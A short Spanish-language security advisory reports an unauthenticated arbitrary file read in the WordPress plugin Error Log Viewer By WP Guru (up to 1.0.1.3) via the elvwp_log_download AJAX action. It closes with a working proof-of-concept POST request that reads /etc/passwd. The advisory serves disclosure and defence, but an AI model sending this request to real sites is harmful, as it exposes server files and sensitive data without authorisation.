
Error Log Viewer By WP Guru <= 1.0.1.3 - Falta de autorización que permite lectura arbitraria de archivos sin autenticación
Error Log Viewer By WP Guru <= 1.0.1.3 - Falta de autorización para lectura arbitraria de archivos sin autenticar
El plugin Error Log Viewer By WP Guru para WordPress es vulnerable a la lectura arbitraria de archivos en todas las versiones hasta la 1.0.1.3 inclusive, a través de la acción AJAX wp_ajax_nopriv_elvwp_log_download. Esto permite que atacantes no autenticados lean el contenido de archivos arbitrarios en el servidor, el cual puede contener información sensible.
POST /wp-admin/admin-ajax.php HTTP/2
Host: wp-dev.ddev.site
Content-Type: application/x-www-form-urlencoded
Content-Length: 80
action=elvwp_log_download&elvwp_error_log_download=1&elvwp_error_log=/etc/passwd